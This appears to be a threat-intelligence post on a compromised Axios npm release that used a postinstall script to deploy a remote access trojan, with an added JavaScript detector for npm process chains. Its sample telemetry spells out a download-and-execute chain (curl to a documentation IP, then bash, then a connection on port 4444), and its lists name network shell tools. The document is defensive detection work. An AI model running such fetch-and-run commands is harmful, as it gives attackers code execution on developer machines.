NPM Package Supply Chain Compromise Leads to RAT Deployment

A supply chain attack targeting the Axios npm package has been identified after threat actors compromised the npm account of the package's lead developer. Malicious versions ([email protected] and [email protected]) were published that pulled in a hidden dependency carrying a postinstall script. Because npm runs lifecycle scripts automatically during installation, the script executed as soon as the package was installed, downloading and deploying a remote access trojan on affected systems with no user interaction, which makes the compromise particularly dangerous for developer workstations and CI/CD pipelines. The result is full remote access to the host, potential exposure of credentials such as API keys and SSH keys, and possible insertion of malicious code into software builds. Detection platforms identified suspicious process execution chains in which npm spawned command interpreters and network utilities, followed by outbound connections to attacker-controlled infrastructure.
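The detection described above (npm spawning a command interpreter or network utility, followed by an outbound connection) can be expressed as a correlation over process and network telemetry. The following is an added example written for this page, not code from the pulse, from AlienVault, or from the Axios project: the event shape, the field names, the interpreter and network-utility lists, the registry allowlist and the sample events are all constructed for the example. Real EDR telemetry will usually show npm as a `node` process with the npm CLI path in its command line, which is why the root is matched on the command line rather than the image name.

```javascript
// Added example: correlate endpoint telemetry for the chain
// npm -> interpreter / network utility -> outbound connection.
// Event shape, field names, lists and sample data are constructed assumptions.

const INTERPRETERS = new Set(["sh", "bash", "zsh", "cmd.exe", "powershell.exe", "pwsh"]);
const NET_UTILS = new Set(["curl", "wget", "nc", "ncat", "certutil.exe", "bitsadmin.exe"]);
const REGISTRY_ALLOWLIST = new Set(["registry.npmjs.org"]); // hosts npm itself may contact

// Constructed telemetry: process-start and network-connect events, EDR style.
const SAMPLE_EVENTS = [
  { type: "process", pid: 100, ppid: 1,   image: "node", cmdline: "npm install" },
  { type: "process", pid: 101, ppid: 100, image: "sh",   cmdline: 'sh -c "node setup.js"' },
  { type: "process", pid: 102, ppid: 101, image: "node", cmdline: "node setup.js" },
  { type: "process", pid: 103, ppid: 102, image: "curl", cmdline: "curl -s http://203.0.113.7/p -o /tmp/.x" },
  { type: "network", pid: 103, dest: "203.0.113.7", port: 80 },
  { type: "process", pid: 104, ppid: 103, image: "bash", cmdline: "bash /tmp/.x" },
  { type: "network", pid: 104, dest: "203.0.113.7", port: 4444 },
  // Benign control: npm fetching from the registry itself, no child in between.
  { type: "process", pid: 200, ppid: 1,   image: "node", cmdline: "npm install" },
  { type: "network", pid: 200, dest: "registry.npmjs.org", port: 443 },
];

// npm normally runs as `node <path>/npm-cli.js ...` or `npm ...`; match the command line.
function isNpm(p) {
  return p.image === "npm" || /\bnpm(\.cmd|-cli\.js)?\b/.test(p.cmdline);
}

function buildProcessTable(events) {
  const byPid = new Map();
  for (const e of events) if (e.type === "process") byPid.set(e.pid, e);
  return byPid;
}

// Walk ppid links from `pid` up to the nearest npm ancestor. Returns the
// process records from that npm root down to `pid`, or null if npm is not
// an ancestor. The `seen` set guards against cyclic or reused pids.
function chainToNpm(byPid, pid) {
  const chain = [];
  const seen = new Set();
  let cur = byPid.get(pid);
  while (cur && !seen.has(cur.pid)) {
    seen.add(cur.pid);
    chain.unshift(cur);
    if (isNpm(cur)) return chain;
    cur = byPid.get(cur.ppid);
  }
  return null;
}

// For every outbound connection whose process descends from npm, decide whether
// the path from npm to the connecting process passed through an interpreter or
// a network utility. npm contacting the registry directly is expected and ignored;
// npm contacting anything else is reported at low severity.
function detectNpmChains(events) {
  const byPid = buildProcessTable(events);
  const alerts = [];
  for (const e of events) {
    if (e.type !== "network") continue;
    const chain = chainToNpm(byPid, e.pid);
    if (!chain) continue;
    const images = chain.map((p) => p.image);
    const leaf = chain[chain.length - 1];
    if (chain.length === 1) {
      if (REGISTRY_ALLOWLIST.has(e.dest)) continue;
      alerts.push({ severity: "low", pid: e.pid, dest: e.dest, port: e.port, chain: images, cmdline: leaf.cmdline });
      continue;
    }
    const viaTool = images.slice(1).some((img) => INTERPRETERS.has(img) || NET_UTILS.has(img));
    if (!viaTool) continue;
    alerts.push({ severity: "high", pid: e.pid, dest: e.dest, port: e.port, chain: images, cmdline: leaf.cmdline });
  }
  return alerts;
}

for (const a of detectNpmChains(SAMPLE_EVENTS)) {
  console.log(`${a.severity}: ${a.chain.join(" > ")} -> ${a.dest}:${a.port} (${a.cmdline})`);
}
```

On the sample events the two connections made by the `curl` download and the `bash` stage it spawned are reported at high severity, while npm's own registry fetch is ignored. On the preventive side, `npm install --ignore-scripts` or `ignore-scripts=true` in `.npmrc` stops lifecycle scripts from running at all, at the cost of breaking packages that legitimately need a build step, so it is usually paired with an explicit, reviewed list of packages allowed to run them.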

Pulse ID: 69d8b0c258b4fef5541358bb
Pulse Link: https://otx.alienvault.com/pulse/69d8b0c258b4fef5541358bb
Pulse Author: AlienVault
Created: 2026-04-10 08:11:46

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #InfoSec #NPM #OTX #OpenThreatExchange #RAT #RemoteAccessTrojan #SSH #SupplyChain #Trojan #Troll #bot #iOS #AlienVault

LevelBlue - Open Threat Exchange
